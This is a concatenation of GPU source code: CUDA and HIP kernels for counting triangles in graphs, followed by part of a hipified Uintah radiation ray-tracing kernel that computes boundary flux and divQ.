graph.getFirstEdge(lookup); index_type lookup_size = graph.getOutDegree(lookup); index_type search_size = graph.getOutDegree(search); if (lookup_size > 0 && search_size > 0) { for (index_type i = thread_lane; i < lookup_size; i += WARP_SIZE) { index_type index = lookup_begin + i; index_type key = graph.getAbsDestination(index); index_type search_begin = graph.getFirstEdge(search); if (binary_search(graph, key, search_begin, search_begin+search_size)) //if (serial_search(graph, key, search_begin, search_begin+search_size)) num_local_triangles.reduce(1); } } } } num_local_triangles.thread_exit<hipcub::BlockReduce<unsigned long, TB_SIZE> >(num_local_triangles_ts); } void sort_cuda(struct CUDA_Context* ctx) { mgc = mgpu::CreateCudaDevice(ctx->device); mgpu::SegSortKeysFromIndices(ctx->gg.edge_dst, ctx->gg.nedges, (const int *) ctx->gg.row_start + 1, ctx->gg.nnodes - 1, *mgc); } void TC_cuda(unsigned __begin, unsigned __end, unsigned long & num_local_triangles, struct CUDA_Context* ctx) { dim3 blocks; dim3 threads; kernel_sizing(blocks, threads); HGAccumulator<unsigned long> _num_local_triangles; Shared<unsigned long> num_local_trianglesval = Shared<unsigned long>(1); *(num_local_trianglesval.cpu_wr_ptr()) = 0; _num_local_triangles.rv = num_local_trianglesval.gpu_wr_ptr(); //mgc = mgpu::CreateCudaDevice(ctx->device); //mgpu::SegSortKeysFromIndices(ctx->gg.edge_dst, ctx->gg.nedges, (const int *) ctx->gg.row_start + 1, ctx->gg.nnodes - 1, *mgc); //base<<<blocks, TB_SIZE>>>(ctx->gg, __begin, __end, _num_local_triangles); hipLaunchKernelGGL(( warp), dim3(blocks), dim3(TB_SIZE), 0, 0, ctx->gg, __begin, __end, _num_local_triangles); hipDeviceSynchronize(); check_cuda_kernel; num_local_triangles = *(num_local_trianglesval.cpu_rd_ptr()); //dump_memory_info("end", ctx->id); hipProfilerStop(); //num_local_triangles = (unsigned)h_total; } void TC_masterNodes_cuda(unsigned long& num_local_triangles, struct CUDA_Context* ctx) { TC_cuda(ctx->beginMaster, ctx->beginMaster + ctx->numOwned, num_local_triangles, ctx); }
9f206e5885080195687b3c6b4fb6fa38e366f19a.cu
#include "gg.h" #include "ggcuda.h" #include "cub/cub.cuh" #include "cub/util_allocator.cuh" #include "thread_work.h" void kernel_sizing(CSRGraph &, dim3 &, dim3 &); #define TB_SIZE 256 #include "kernels/reduce.cuh" #include "tc_cuda.cuh" #include "kernels/segmentedsort.cuh" #include "moderngpu.cuh" #include "util/mgpucontext.h" #include <cuda_profiler_api.h> mgpu::ContextPtr mgc; #define WARP_SIZE 32 inline __device__ unsigned long intersect(CSRGraph graph, index_type u, index_type v) { index_type u_start = graph.getFirstEdge(u); index_type u_end = u_start + graph.getOutDegree(u); index_type v_start = graph.getFirstEdge(v); index_type v_end = v_start + graph.getOutDegree(v); unsigned long count = 0; index_type u_it = u_start; index_type v_it = v_start; index_type a; index_type b; while (u_it < u_end && v_it < v_end) { a = graph.getAbsDestination(u_it); b = graph.getAbsDestination(v_it); int d = a - b; if (d <= 0) u_it++; if (d >= 0) v_it++; if (d == 0) count++; } return count; } __global__ void base(CSRGraph graph, unsigned begin, unsigned end, HGAccumulator<unsigned long> num_local_triangles) { unsigned tid = blockIdx.x * blockDim.x + threadIdx.x; unsigned long local_total = 0; __shared__ cub::BlockReduce<unsigned long, TB_SIZE>::TempStorage num_local_triangles_ts; num_local_triangles.thread_entry(); for (index_type src = begin + tid; src < end; src += TOTAL_THREADS_1D) { index_type row_begin = graph.getFirstEdge(src); index_type row_end = row_begin + graph.getOutDegree(src); for (index_type offset = row_begin; offset < row_end; ++ offset) { index_type dst = graph.getAbsDestination(offset); local_total = intersect(graph, dst, src); if (local_total) num_local_triangles.reduce(local_total); } } num_local_triangles.thread_exit<cub::BlockReduce<unsigned long, TB_SIZE> >(num_local_triangles_ts); } inline __device__ bool serial_search(CSRGraph graph, unsigned key, index_type begin, index_type end) { for (index_type offset = begin; offset < end; ++ offset) { index_type d = graph.getAbsDestination(offset); if (d == key) return true; if (d > key) return false; } return false; } inline __device__ bool binary_search(CSRGraph graph, index_type key, index_type begin, index_type end) { assert(begin < end); int l = begin; int r = end-1; while (r >= l) { //assert(l<graph.nedges && r<graph.nedges); int mid = l + (r - l) / 2; if (mid >= graph.nedges) printf("mid=%u, l=%u, r=%u, begin=%u, end=%u, key=%u\n", mid, l, r, begin, end, key); assert(mid < graph.nedges); index_type value = graph.getAbsDestination(mid); if (value == key) return true; if (value < key) l = mid + 1; else r = mid - 1; } return false; } __global__ void warp(CSRGraph graph, unsigned begin, unsigned end, HGAccumulator<unsigned long> num_local_triangles) { unsigned thread_id = blockIdx.x * blockDim.x + threadIdx.x; unsigned thread_lane = threadIdx.x & (WARP_SIZE-1); // thread index within the warp unsigned warp_id = thread_id / WARP_SIZE; // global warp index unsigned warp_lane = threadIdx.x / WARP_SIZE; // warp index within the CTA unsigned num_warps = (TB_SIZE / WARP_SIZE) * gridDim.x; // total number of active warps __shared__ cub::BlockReduce<unsigned long, TB_SIZE>::TempStorage num_local_triangles_ts; num_local_triangles.thread_entry(); // each warp takes one vertex for (index_type src = begin + warp_id; src < end; src += num_warps) { index_type row_begin = graph.getFirstEdge(src); index_type src_size = graph.getOutDegree(src); index_type row_end = row_begin + src_size; // take one edge for (index_type offset = row_begin; offset < row_end; offset ++) { index_type dst = graph.getAbsDestination(offset); assert(src != dst); index_type dst_size = graph.getOutDegree(dst); index_type lookup = src; index_type search = dst; if (src_size > dst_size) { lookup = dst; search = src; } index_type lookup_begin = graph.getFirstEdge(lookup); index_type lookup_size = graph.getOutDegree(lookup); index_type search_size = graph.getOutDegree(search); if (lookup_size > 0 && search_size > 0) { for (index_type i = thread_lane; i < lookup_size; i += WARP_SIZE) { index_type index = lookup_begin + i; index_type key = graph.getAbsDestination(index); index_type search_begin = graph.getFirstEdge(search); if (binary_search(graph, key, search_begin, search_begin+search_size)) //if (serial_search(graph, key, search_begin, search_begin+search_size)) num_local_triangles.reduce(1); } } } } num_local_triangles.thread_exit<cub::BlockReduce<unsigned long, TB_SIZE> >(num_local_triangles_ts); } void sort_cuda(struct CUDA_Context* ctx) { mgc = mgpu::CreateCudaDevice(ctx->device); mgpu::SegSortKeysFromIndices(ctx->gg.edge_dst, ctx->gg.nedges, (const int *) ctx->gg.row_start + 1, ctx->gg.nnodes - 1, *mgc); } void TC_cuda(unsigned __begin, unsigned __end, unsigned long & num_local_triangles, struct CUDA_Context* ctx) { dim3 blocks; dim3 threads; kernel_sizing(blocks, threads); HGAccumulator<unsigned long> _num_local_triangles; Shared<unsigned long> num_local_trianglesval = Shared<unsigned long>(1); *(num_local_trianglesval.cpu_wr_ptr()) = 0; _num_local_triangles.rv = num_local_trianglesval.gpu_wr_ptr(); //mgc = mgpu::CreateCudaDevice(ctx->device); //mgpu::SegSortKeysFromIndices(ctx->gg.edge_dst, ctx->gg.nedges, (const int *) ctx->gg.row_start + 1, ctx->gg.nnodes - 1, *mgc); //base<<<blocks, TB_SIZE>>>(ctx->gg, __begin, __end, _num_local_triangles); warp<<<blocks, TB_SIZE>>>(ctx->gg, __begin, __end, _num_local_triangles); cudaDeviceSynchronize(); check_cuda_kernel; num_local_triangles = *(num_local_trianglesval.cpu_rd_ptr()); //dump_memory_info("end", ctx->id); cudaProfilerStop(); //num_local_triangles = (unsigned)h_total; } void TC_masterNodes_cuda(unsigned long& num_local_triangles, struct CUDA_Context* ctx) { TC_cuda(ctx->beginMaster, ctx->beginMaster + ctx->numOwned, num_local_triangles, ctx); }
4af0e54c4c3497c17d9e89041e6ff7533ac12d13.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * The MIT License * * Copyright (c) 1997-2018 The University of Utah * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #include <CCA/Components/Models/Radiation/RMCRT/RayGPU.cuh> #include <CCA/Components/Schedulers/GPUDataWarehouse.h> #include <CCA/Components/Schedulers/GPUMemoryPool.h> #include <CCA/Components/Schedulers/DetailedTasks.h> #include <Core/Grid/Variables/GPUGridVariable.h> #include <Core/Grid/Variables/GPUStencil7.h> #include <Core/Grid/Variables/Stencil7.h> #include <Core/Util/GPU.h> #include <sci_defs/cuda_defs.h> #include <sci_defs/uintah_defs.h> #include <hiprand/hiprand.h> #include <hiprand/hiprand_kernel.h> #define __CUDA_INTERNAL_COMPILATION__ #include "math_functions.h" // needed for max() #undef __CUDA_INTERNAL_COMPILATION__ #define DEBUG -9 // 1: divQ, 2: boundFlux, 3: scattering //#define FIXED_RANDOM_NUM // also edit in src/Core/Math/MersenneTwister.h to compare with Ray:CPU #define FIXED_RAY_DIR -9 // Sets ray direction. 1: (0.7071,0.7071, 0), 2: (0.7071, 0, 0.7071), 3: (0, 0.7071, 0.7071) // 4: (0.7071, 0.7071, 7071), 5: (1,0,0) 6: (0, 1, 0), 7: (0,0,1) #define SIGN 1 // Multiply the FIXED_RAY_DIRs by value //__________________________________ // To Do // - Investigate using multiple GPUs per node. // - Implement fixed and dynamic ROI. // - dynamic block size? // - Implement labelNames in unified memory. // - investigate the performance with different patch configurations // - deterministic random numbers // - Ray steps //__________________________________ // // To use cuda-gdb on a single GPU you must set the environmental variable // CUDA_DEBUGGER_SOFTWARE_PREEMPTION=1 // // mpirun -np 1 xterm -e cuda-gdb sus -gpu -nthreads 2 <args> //__________________________________ namespace Uintah { //--------------------------------------------------------------------------- // Kernel: The GPU ray tracer kernel //--------------------------------------------------------------------------- template< class T> __global__ void rayTraceKernel( dim3 dimGrid, dim3 dimBlock, const int matl, levelParams level, patchParams patch, hiprandState_t* randNumStates, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { // Not used right now // int blockID = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; // int threadID = threadIdx.x + blockDim.x * threadIdx.y + (blockDim.x * blockDim.y) * threadIdx.z; // calculate the thread indices int tidX = threadIdx.x + blockIdx.x * blockDim.x + patch.loEC.x; int tidY = threadIdx.y + blockIdx.y * blockDim.y + patch.loEC.y; const GPUGridVariable< T > sigmaT4OverPi; const GPUGridVariable< T > abskg; // Need to use getRegion() to get the data const GPUGridVariable<int> cellType; GPUGridVariable<double> divQ; GPUGridVariable<GPUStencil7> boundFlux; GPUGridVariable<double> radiationVolQ; // sigmaT4_gdw->print(); sigmaT4_gdw->getLevel( sigmaT4OverPi, "sigmaT4", matl, level.index); cellType_gdw->getLevel( cellType, "cellType", matl, level.index); if(RT_flags.usingFloats){ abskg_gdw->getLevel( abskg, "abskgRMCRT", matl, level.index); }else{ abskg_gdw->getLevel( abskg, "abskg", matl, level.index); } if( RT_flags.modifies_divQ ){ new_gdw->getModifiable( divQ, "divQ", patch.ID, matl ); new_gdw->getModifiable( boundFlux, "RMCRTboundFlux", patch.ID, matl ); new_gdw->getModifiable( radiationVolQ,"radiationVolq", patch.ID, matl ); }else{ new_gdw->get( divQ, "divQ", patch.ID, matl ); // these should be allocateAndPut() calls new_gdw->get( boundFlux, "RMCRTboundFlux", patch.ID, matl ); new_gdw->get( radiationVolQ,"radiationVolq", patch.ID, matl ); // Extra Cell Loop if ( (tidX >= patch.loEC.x) && (tidY >= patch.loEC.y) && (tidX < patch.hiEC.x) && (tidY < patch.hiEC.y) ) { // patch boundary check #pragma unroll for (int z = patch.loEC.z; z < patch.hiEC.z; z++) { // loop through z slices GPUIntVector c = make_int3(tidX, tidY, z); divQ[c] = 0.0; radiationVolQ[c] = 0.0; boundFlux[c].initialize(0.0); } } } //__________________________________ // Sanity checks #if 0 if (isThread0()) { printf(" GPUVariable Sanity check level: %i, patch: %i \n",level.index, patch.ID); } #endif GPUVariableSanityCK(abskg, patch.loEC, patch.hiEC); GPUVariableSanityCK(sigmaT4OverPi, patch.loEC, patch.hiEC); bool doLatinHyperCube = (RT_flags.rayDirSampleAlgo == LATIN_HYPER_CUBE); const int nFluxRays = RT_flags.nFluxRays; // for readability // This rand_i array is only needed for LATIN_HYPER_CUBE scheme const int size = 1000; int rand_i[ size ]; //Give it a buffer room of 1000. But we should only use nFluxRays items in it. //Hopefully this 1000 will always be greater than nFluxRays. //TODO, a 4D array is probably better here (x,y,z, ray#), saves //on memory (no unused buffer) and computation time (don't need to compute //the rays twice) if (nFluxRays > size) { printf("\n\n\nERROR! rayTraceKernel() - Cannot have more rays than the rand_i array size. nFluxRays is %d, size of the array is.%d\n\n\n", nFluxRays, size); //We have to return, otherwise the upcoming math in rayDirectionHyperCube_cellFaceDevice will generate nan values. return; } //______________________________________________________________________ // R A D I O M E T E R //______________________________________________________________________ // TO BE FILLED IN //______________________________________________________________________ // B O U N D A R Y F L U X //______________________________________________________________________ setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), patch.ID, curTimeStep); if( RT_flags.solveBoundaryFlux ){ __shared__ int3 dirIndexOrder[6]; __shared__ int3 dirSignSwap[6]; //_____________________________________________ // Ordering for Surface Method // This block of code is used to properly place ray origins, and orient ray directions // onto the correct face. This is necessary, because by default, the rays are placed // and oriented onto a default face, then require adjustment onto the proper face. dirIndexOrder[EAST] = make_int3(2, 1, 0); dirIndexOrder[WEST] = make_int3(2, 1, 0); dirIndexOrder[NORTH] = make_int3(0, 2, 1); dirIndexOrder[SOUTH] = make_int3(0, 2, 1); dirIndexOrder[TOP] = make_int3(0, 1, 2); dirIndexOrder[BOT] = make_int3(0, 1, 2); // Ordering is slightly different from 6Flux since here, rays pass through origin cell from the inside faces. dirSignSwap[EAST] = make_int3(-1, 1, 1); dirSignSwap[WEST] = make_int3( 1, 1, 1); dirSignSwap[NORTH] = make_int3( 1, -1, 1); dirSignSwap[SOUTH] = make_int3( 1, 1, 1); dirSignSwap[TOP] = make_int3( 1, 1, -1); dirSignSwap[BOT] = make_int3( 1, 1, 1); __syncthreads(); //__________________________________ // GPU equivalent of GridIterator loop - calculate sets of rays per thread if ( (tidX >= patch.lo.x) && (tidY >= patch.lo.y) && (tidX < patch.hi.x) && (tidY < patch.hi.y) ) { // patch boundary check #pragma unroll for (int z = patch.lo.z; z < patch.hi.z; z++) { // loop through z slices GPUIntVector origin = make_int3(tidX, tidY, z); // for each thread //get a new set of random numbers if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } boundFlux[origin].initialize(0.0); BoundaryFaces boundaryFaces; // which surrounding cells are boundaries boundFlux[origin].p = has_a_boundaryDevice(origin, cellType, boundaryFaces); GPUPoint CC_pos = level.getCellPosition(origin); //__________________________________ // Loop over boundary faces of the cell and compute incident radiative flux #pragma unroll for( int i = 0; i<boundaryFaces.size(); i++) { int RayFace = boundaryFaces.faceArray[i]; int UintahFace[6] = {WEST,EAST,SOUTH,NORTH,BOT,TOP}; double sumI = 0; double sumProjI = 0; double sumI_prev = 0; double sumCosTheta = 0; // used to force sumCosTheta/nRays == 0.5 or sum (d_Omega * cosTheta) == pi //__________________________________ // Flux ray loop #pragma unroll for (int iRay=0; iRay < nFluxRays; iRay++){ GPUVector direction_vector; GPUVector rayOrigin; double cosTheta; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling rayDirectionHyperCube_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta, rand_i[iRay], iRay, nFluxRays); } else { rayDirection_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta ); } rayLocation_cellFaceDevice( randNumStates, RayFace, patch.dx, CC_pos, rayOrigin); updateSumIDevice< T >( level, direction_vector, rayOrigin, origin, patch.dx, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); sumProjI += cosTheta * (sumI - sumI_prev); // must subtract sumI_prev, since sumI accumulates intensity sumCosTheta += cosTheta; sumI_prev = sumI; } // end of flux ray loop sumProjI = sumProjI * (double) nFluxRays/sumCosTheta/2.0; // This operation corrects for error in the first moment over a // half range of the solid angle (Modest Radiative Heat Transfer page 545 1st edition) //__________________________________ // Compute Net Flux to the boundary int face = UintahFace[RayFace]; boundFlux[origin][ face ] = sumProjI * 2 *M_PI/(double)nFluxRays; #if ( DEBUG == 2 ) if( isDbgCellDevice(origin) ) { printf( "\n [%d, %d, %d] face: %d sumProjI: %g BoundaryFlux: %g\n", origin.x, origin.y, origin.z, face, sumProjI, boundFlux[origin][ face ]); } #endif } // boundary faces loop } // z slices loop } // X-Y Thread loop } //______________________________________________________________________ // S O L V E D I V Q //______________________________________________________________________ //Setup the original seeds so we can get the same random numbers again. setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), patch.ID, curTimeStep); if( RT_flags.solveDivQ ){ const int nDivQRays = RT_flags.nDivQRays; // for readability // GPU equivalent of GridIterator loop - calculate sets of rays per thread if ( (tidX >= patch.lo.x) && (tidY >= patch.lo.y) && (tidX < patch.hi.x) && (tidY < patch.hi.y) ) { // patch boundary check #pragma unroll for (int z = patch.lo.z; z < patch.hi.z; z++) { // loop through z slices GPUIntVector origin = make_int3(tidX, tidY, z); // for each thread //Get the same set of random numbers as we had before. We need the same rays. if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } double sumI = 0; GPUPoint CC_pos = level.getCellPosition(origin); // don't compute in intrusions and walls if( cellType[origin] != d_flowCell ){ continue; } //__________________________________ // ray loop #pragma unroll for (int iRay = 0; iRay < nDivQRays; iRay++) { GPUVector direction_vector; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling direction_vector = findRayDirectionHyperCubeDevice(randNumStates, nDivQRays, rand_i[iRay], iRay ); }else{ // Naive Monte-Carlo sampling direction_vector = findRayDirectionDevice( randNumStates ); } GPUVector rayOrigin = rayOriginDevice( randNumStates, CC_pos, patch.dx, RT_flags.CCRays ); updateSumIDevice< T >( level, direction_vector, rayOrigin, origin, patch.dx, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); } //Ray loop //__________________________________ // Compute divQ divQ[origin] = -4.0 * M_PI * abskg[origin] * ( sigmaT4OverPi[origin] - (sumI/RT_flags.nDivQRays) ); // radiationVolq is the incident energy per cell (W/m^3) and is necessary when particle heat transfer models (i.e. Shaddix) are used radiationVolQ[origin] = 4.0 * M_PI * abskg[origin] * (sumI/RT_flags.nDivQRays) ; #if ( DEBUG == 1) if( isDbgCellDevice( origin ) ){ printf( "\n [%d, %d, %d] sumI: %1.16e divQ: %1.16e radiationVolq: %1.16e abskg: %1.16e, sigmaT4: %1.16e \n", origin.x, origin.y, origin.z, sumI,divQ[origin], radiationVolQ[origin],abskg[origin], sigmaT4OverPi[origin]); } #endif } // end z-slice loop } // end domain boundary check } // solve divQ } // end ray trace kernel //--------------------------------------------------------------------------- // Kernel: The GPU ray tracer data onion kernel //--------------------------------------------------------------------------- // hard-wired for 2-levels now, but this should be fast and fixes __constant__ levelParams d_levels[d_MAXLEVELS]; template< class T> __global__ #if NDEBUG //Uinth has a DNDEBUG compiler defined flag in normal trunk builds. Debug builds have no compiler flags we can capture. __launch_bounds__(640, 1) // For 96 registers with 320 threads. Allows two kernels to fit within an SM. // Seems to be the performance sweet spot in release mode. #endif void rayTraceDataOnionKernel( dim3 dimGrid, dim3 dimBlock, int matl, patchParams finePatch, gridParams gridP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, int3* regionLo, int3* regionHi, hiprandState_t* randNumStates, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { #if 0 if (tidX == 1 && tidY == 1) { printf("\nGPU levelParams\n"); printf("Level-0 "); d_levels[0].print(); printf("Level-1 "); d_levels[1].print(); } #endif int maxLevels = gridP.maxLevels; int fineL = maxLevels - 1; levelParams fineLevel = d_levels[fineL]; //compute startCell and endCell relative to the block int startCell = RT_flags.startCell + ((RT_flags.endCell - RT_flags.startCell) / gridDim.x) * blockIdx.x; int endCell = RT_flags.startCell + ((RT_flags.endCell - RT_flags.startCell) / gridDim.x) * (blockIdx.x + 1); RT_flags.startCell = startCell; RT_flags.endCell = endCell; //__________________________________ // const GPUGridVariable<T> abskg[d_MAXLEVELS]; const GPUGridVariable<T> sigmaT4OverPi[d_MAXLEVELS]; const GPUGridVariable<int> cellType[d_MAXLEVELS]; // new_gdw->print(); //__________________________________ // coarse level data for the entire level for (int l = 0; l < maxLevels; ++l) { if (d_levels[l].hasFinerLevel) { if(RT_flags.usingFloats){ abskg_gdw->getLevel( abskg[l], "abskgRMCRT", matl, l); } else { abskg_gdw->getLevel( abskg[l], "abskg", matl, l); } sigmaT4_gdw->getLevel( sigmaT4OverPi[l], "sigmaT4", matl, l); cellType_gdw->getLevel( cellType[l], "cellType", matl, l); GPUVariableSanityCK(abskg[l], d_levels[l].regionLo,d_levels[l].regionHi); GPUVariableSanityCK(sigmaT4OverPi[l],d_levels[l].regionLo,d_levels[l].regionHi); } } //__________________________________ // fine level data for the region of interest. // ToDo: replace get with getRegion() calls so // so the halo can be > 0 if ( RT_flags.whichROI_algo == patch_based ) { if(RT_flags.usingFloats){ abskg_gdw->get(abskg[fineL], "abskgRMCRT", finePatch.ID, matl, fineL); } else { abskg_gdw->get(abskg[fineL], "abskg", finePatch.ID, matl, fineL); } sigmaT4_gdw->get(sigmaT4OverPi[fineL], "sigmaT4", finePatch.ID, matl, fineL); cellType_gdw->get(cellType[fineL], "cellType", finePatch.ID, matl, fineL); GPUVariableSanityCK(abskg[fineL], fineLevel_ROI_Lo,fineLevel_ROI_Hi); GPUVariableSanityCK(sigmaT4OverPi[fineL],fineLevel_ROI_Lo,fineLevel_ROI_Hi); } GPUGridVariable<double> divQ_fine; GPUGridVariable<GPUStencil7> boundFlux_fine; GPUGridVariable<double> radiationVolQ_fine; //__________________________________ // fine level data for this patch if( RT_flags.modifies_divQ ){ new_gdw->getModifiable( divQ_fine, "divQ", finePatch.ID, matl, fineL ); new_gdw->getModifiable( boundFlux_fine, "RMCRTboundFlux", finePatch.ID, matl, fineL ); new_gdw->getModifiable( radiationVolQ_fine,"radiationVolq", finePatch.ID, matl, fineL ); }else{ new_gdw->get( divQ_fine, "divQ", finePatch.ID, matl, fineL ); // these should be allocateAntPut() calls new_gdw->get( boundFlux_fine, "RMCRTboundFlux", finePatch.ID, matl, fineL ); new_gdw->get( radiationVolQ_fine,"radiationVolq", finePatch.ID, matl, fineL ); //__________________________________ // initialize Extra Cell Loop int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector c = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { divQ_fine[c] = 0.0; radiationVolQ_fine[c] = 0.0; boundFlux_fine[c].initialize(0.0); //move to the next cell threadID += blockDim.x; c.x = (threadID % finePatchSize.x) + finePatch.lo.x; c.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; c.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; } } //We're going to change thread to cell mappings, so make sure all vars have been initialized before continuing __syncthreads(); //__________________________________ // bool doLatinHyperCube = (RT_flags.rayDirSampleAlgo == LATIN_HYPER_CUBE); const int nFluxRays = RT_flags.nFluxRays; // for readability // This rand_i array is only needed for LATIN_HYPER_CUBE scheme //const int size = 500; int rand_i[ d_MAX_RAYS ]; //Give it a buffer room for many rays. //Hopefully this 500 will always be greater than the number of rays. //TODO, a 4D array is probably better here (x,y,z, ray#), saves //on memory (no unused buffer) if (nFluxRays > d_MAX_RAYS || RT_flags.nDivQRays > d_MAX_RAYS) { printf("\n\n\nERROR! rayTraceKernel() - Cannot have more rays than the rand_i array size. Flux rays: %d, divQ rays: %d, size of the array is.%d\n\n\n", nFluxRays, RT_flags.nFluxRays, d_MAX_RAYS); //We have to return, otherwise the upcoming math in rayDirectionHyperCube_cellFaceDevice will generate nan values. return; } setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), finePatch.ID, curTimeStep); //______________________________________________________________________ // R A D I O M E T E R //______________________________________________________________________ // TO BE FILLED IN //______________________________________________________________________ // B O U N D A R Y F L U X //______________________________________________________________________ if( RT_flags.solveBoundaryFlux ){ int3 dirIndexOrder[6]; int3 dirSignSwap[6]; //_____________________________________________ // Ordering for Surface Method // This block of code is used to properly place ray origins, and orient ray directions // onto the correct face. This is necessary, because by default, the rays are placed // and oriented onto a default face, then require adjustment onto the proper face. dirIndexOrder[EAST] = make_int3(2, 1, 0); dirIndexOrder[WEST] = make_int3(2, 1, 0); dirIndexOrder[NORTH] = make_int3(0, 2, 1); dirIndexOrder[SOUTH] = make_int3(0, 2, 1); dirIndexOrder[TOP] = make_int3(0, 1, 2); dirIndexOrder[BOT] = make_int3(0, 1, 2); // Ordering is slightly different from 6Flux since here, rays pass through origin cell from the inside faces. dirSignSwap[EAST] = make_int3(-1, 1, 1); dirSignSwap[WEST] = make_int3( 1, 1, 1); dirSignSwap[NORTH] = make_int3( 1, -1, 1); dirSignSwap[SOUTH] = make_int3( 1, 1, 1); dirSignSwap[TOP] = make_int3( 1, 1, -1); dirSignSwap[BOT] = make_int3( 1, 1, 1); int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector origin = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { //get a new set of random numbers if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } if (cellType[fineL][origin] == d_flowCell) { // don't solve for fluxes in intrusions boundFlux_fine[origin].initialize(0.0); //FIXME: Already initialized? BoundaryFaces boundaryFaces; // which surrounding cells are boundaries boundFlux_fine[origin].p = has_a_boundaryDevice(origin, cellType[fineL], boundaryFaces); GPUPoint CC_pos = fineLevel.getCellPosition(origin); //__________________________________ // Loop over boundary faces of the cell and compute incident radiative flux #pragma unroll for( int i = 0; i<boundaryFaces.size(); i++) { int RayFace = boundaryFaces.faceArray[i]; int UintahFace[6] = {WEST,EAST,SOUTH,NORTH,BOT,TOP}; double sumI = 0; double sumProjI = 0; double sumI_prev = 0; double sumCosTheta = 0; // used to force sumCosTheta/nRays == 0.5 or sum (d_Omega * cosTheta) == pi //__________________________________ // Flux ray loop #pragma unroll for (int iRay=0; iRay < nFluxRays; iRay++){ GPUVector direction_vector; GPUVector rayOrigin; double cosTheta; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling rayDirectionHyperCube_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta, rand_i[iRay], iRay, nFluxRays); } else{ // Naive Monte-Carlo sampling rayDirection_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta ); } rayLocation_cellFaceDevice( randNumStates, RayFace, finePatch.dx, CC_pos, rayOrigin); updateSumI_MLDevice<T>( direction_vector, rayOrigin, origin, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, regionLo, regionHi, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); sumProjI += cosTheta * (sumI - sumI_prev); // must subtract sumI_prev, since sumI accumulates intensity sumCosTheta += cosTheta; sumI_prev = sumI; } // end of flux ray loop sumProjI = sumProjI * (double) RT_flags.nFluxRays/sumCosTheta/2.0; // This operation corrects for error in the first moment over a half range of the solid angle (Modest Radiative Heat Transfer page 545 1rst edition) //__________________________________ // Compute Net Flux to the boundary int face = UintahFace[RayFace]; boundFlux_fine[origin][ face ] = sumProjI * 2 *M_PI/ (double) RT_flags.nFluxRays; //==========TESTING========== #if (DEBUG == 2) if( isDbgCell(origin) ) { printf( "\n [%d, %d, %d] face: %d sumProjI: %g BoundaryFlux: %g\n", origin.x, origin.y, origin.z, face, sumProjI, boundFlux_fine[origin][ face ] ); 